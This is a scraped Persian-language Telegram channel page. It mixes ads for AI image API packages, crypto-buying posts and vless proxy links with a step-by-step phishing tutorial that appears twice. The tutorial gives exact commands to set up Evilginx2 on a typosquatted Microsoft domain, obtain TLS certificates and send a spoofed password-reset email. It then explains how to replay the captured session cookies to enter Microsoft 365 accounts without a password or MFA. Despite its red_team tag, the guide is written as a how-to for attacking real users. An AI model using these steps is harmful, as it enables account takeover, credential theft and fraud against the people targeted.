ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ
رفتن به کانال در Telegram
Dear @durov In this channel there isn't any content that violates copyright laws. Contents of this channel are for helping people. Please ignore traitors reports. Thank yo ❗️ هر استفاده نادرست به عهده خود شخص میباشد ❗️
نمایش بیشتر4 700
مشترکین
-9324 ساعت
+4217 روز
-37230 روز
آرشیو پست ها
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
فروش محدود پکیج وب سرویس هوش مصنوعی با عکس 🔥
ساخت عکس با متن و تبدیل عکس ⚡️
حساب بصورت دلاری شارژ شده است ‼️
مخصوص توسعه دهنده ها و طراحان 🍾
مدلای زیادی داره میخاید ببینید بیاید پیوی
قیمت هر ریکوئست : 100 تک تومان 💸
ظرفیت موجود : 50 هزار درخواست 🔝
لیست پکیج ها :
1️⃣ 1000 درخواست : 100.000 تومان
2️⃣ 2000 درخواست : 195.000 تومان
3️⃣ 5000 درخواست : 475.000 تومان
4️⃣ 10000 درخواست : 900.000 تومان
5️⃣ 20000 درخواست : 1.699.000 تومان
جهت خرید،اطلاعات بیشتر و دریافت نمونه پیوی مراجعه کنید ❓
💻 @SENATOR_HERO
4 713
⭕️ وب سرویس پیشرفته قیمت گیفت ⭕️
⚙هم قیمت پورتال میده هم قیمت تونل🔵
🕦 تغییرات ۲۴ ساعته و هفتگی 🕦
🖥 نمایش مقدار سود ضرر گیفت 🖥
🔥 اشتراک ماهانه فقط و فقط ۱۰ دلار 🔥
😵🤔🙁😝 @Dev_Clown 😤☹️🙁☹️
4 713
QLPro: Automated Code Vulnerability Discovery via LLM and Static
Code Analysis Integration
⚜️ @Expire_Security ⚜️
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
ووو سرویسی جدید از تیم سناتور وب 👀
حالا سناتور وب در پیام رسان بله راه اندازی شد ❤️🔥
همه امکانات دقیقاً مثل تلگرام , بدون مشکل , دسترس و سریع 👍
عضو کانال و ربات بله شو و استفاده کن: ⚡️
کانال سناتور وب در بله : @SenatorApi
آیدی ربات مدیریت وب در بله : @SenatorApiBot
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
ارز دیجیتال اگر دارید خریدارم
@SENATOR_HERO
تتر ترون تون و....
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
vless://a6353f00-f94d-4966-bffc-d1109863960c@s3.weserver.space:5942?type=ws&path=%2F&host=telewebion.com&security=none#Telegram : @SenatorAPIمتصل
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
vless://a40b8dd7-9a3a-4b3a-a87c-6c302b12810b@Iran3.node-url.com:10003?security=none&type=tcp&headerType=http&path=%2F&host=#Telegram : @SenatorAPIفعلا وصله
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
vless://4c445784-dadb-4156-ba39-b33fab0dc662@s2.weserver.space:3844?type=ws&path=%2F&host=telewebion.com&security=none#Userbot21147-3aj1lOAknvxQu46تماشا کنید
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
https://www.youtube.com/watch?v=G3LuNFpyHzs
لایو زنده تل آویو
4 713
Repost from 𝐒𝐄𝐍𝐀𝐓𝐎𝐑 𝐀𝐏𝐈 | تیم سناتور | سناتور وب | وب سرویس
vless://b339248c-1a86-40f5-9761-27a7e88ef60a@s3.weserver.space:5926?type=ws&path=%2F&host=telewebion.com&security=none#Userbot21004-vL5W4kux9khO1y140 گیگ درست مصرف کنید Like ❤️
4 713
برای این هم میتونیم از ابزار هایی که وظیفشون تولید همچین دامین هایی هست استفاده کنیم که نمونش
ابزار
dnstwist
هست
https://github.com/elceef/dnstwist
که میتونه دامنه هایی که قبلا تولید شده رو هم نشون بده
⚜️ @Expire_Security ⚜️
4 713
⭐️دسترسی به حساب Microsoft 365 که با رمز عبور و تایید دومرحلهای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA
مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت
کاری که میکنیم
یه دامنه تقلبی ثبت میکنیم مثلا
m1crosoft-support.com
به جای حرف i از عدد 1 استفاده کردیم
این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته
دامنه رو از یه جایی میخریم که گواهی امنیتی رایگان HTTPS میده مثل
Namecheap
Porkbun
تنظیم میکنیم که این دامنه به سرور ما VPS وصل بشه
مرحله ۲ راهاندازی ابزار Evilginx2 روی سرور
Evilginx2 یه ابزار فیشینگ حرفهایه که کمک میکنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم
ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه
نصب ابزارها با دستور
sudo apt update && sudo apt install git make gcc certbot -y
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx
تنظیمات اولیه برای دامنه
config domain m1crosoft-support.com
config ip آی پی سرور شما
config redirect_url https://login.microsoftonline.com
config site microsoft
enable microsoft
گرفتن گواهی امنیتی HTTPS رایگان
sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns
و بعد فایلهای امنیتی رو به Evilginx2 معرفی میکنیم
config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem
config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem
مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف
هدف اینه که کاربر روی لینک جعلی کلیک کنه
نمونه متن ایمیل میتونه به این صورت باشه
موضوع : مهم تغییر اجباری رمز حساب Microsoft 365
کاربر گرامی
برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید
https://m1crosoft-support com/auth
ترفندهایی که میتونیم بزنیم:
جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه
استفاده از لینکهای کوتاه یا QR Code برای پنهان کردن لینک جعلی
ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک
مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر
وقتی کاربر روی لینک کلیک میکنه
سایت جعلی ما باز میشه
Evilginx2 اطلاعات ورود کاربر رو میگیره ولی همزمان کاربر واقعا وارد Microsoft میشه
در پشت صحنه ما توکنهای ورود Session Token رو از مرورگر کاربر میگیریم
مثلا چیزی شبیه این توی لاگها ظاهر میشه
Captured new credentials
Username user@company.com
Session Tokens {...}
مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA
الان که توکنها رو داریم نیازی به رمز عبور یا تایید MFA نیست
برای استفاده از توکن
مرورگر مثلا Chrome رو باز کن
یه تب مخفی incognito باز کن
برو به DevTools F12 تب Application بخش Cookies
مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکیها اضافه کن
صفحه Microsoft 365 رو ریفرش کن
ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه
#red_team
#phising
#Evilginx2
⚜️ @Expire_Security ⚜️
4 713
⭐️دسترسی به حساب Microsoft 365
که با رمز عبور و تایید دومرحلهای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA
مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت
کاری که میکنیم
یه دامنه تقلبی ثبت میکنیم مثلا
m1crosoft-support.com
به جای حرف i از عدد 1 استفاده کردیم
این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته
دامنه رو از یه جایی میخریم که گواهی امنیتی رایگان HTTPS میده مثل
Namecheap
Porkbun
تنظیم میکنیم که این دامنه به سرور ما VPS وصل بشه
مرحله ۲ راهاندازی ابزار Evilginx2 روی سرور
Evilginx2 یه ابزار فیشینگ حرفهایه که کمک میکنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم
ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه
نصب ابزارها با دستور
sudo apt update && sudo apt install git make gcc certbot -y
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx
تنظیمات اولیه برای دامنه
config domain m1crosoft-support.com
config ip آی پی سرور شما
config redirect_url https://login.microsoftonline.com
config site microsoft
enable microsoft
گرفتن گواهی امنیتی HTTPS رایگان
sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns
و بعد فایلهای امنیتی رو به Evilginx2 معرفی میکنیم
config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem
config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem
مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف
هدف اینه که کاربر روی لینک جعلی کلیک کنه
نمونه متن ایمیل میتونه به این صورت باشه
موضوع : مهم تغییر اجباری رمز حساب Microsoft 365
کاربر گرامی
برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید
https://m1crosoft-support com/auth
ترفندهایی که میتونیم بزنیم:
جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه
استفاده از لینکهای کوتاه یا QR Code برای پنهان کردن لینک جعلی
ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک
مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر
وقتی کاربر روی لینک کلیک میکنه
سایت جعلی ما باز میشه
Evilginx2 اطلاعات ورود کاربر رو میگیره ولی همزمان کاربر واقعا وارد Microsoft میشه
در پشت صحنه ما توکنهای ورود Session Token رو از مرورگر کاربر میگیریم
مثلا چیزی شبیه این توی لاگها ظاهر میشه
Captured new credentials
Username user@company.com
Session Tokens {...}
مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA
الان که توکنها رو داریم نیازی به رمز عبور یا تایید MFA نیست
برای استفاده از توکن
مرورگر مثلا Chrome رو باز کن
یه تب مخفی incognito باز کن
برو به DevTools F12 تب Application بخش Cookies
مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکیها اضافه کن
صفحه Microsoft 365 رو ریفرش کن
ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه
#red_team
#phising
#Evilginx2
⚜️ @Expire_Security ⚜️
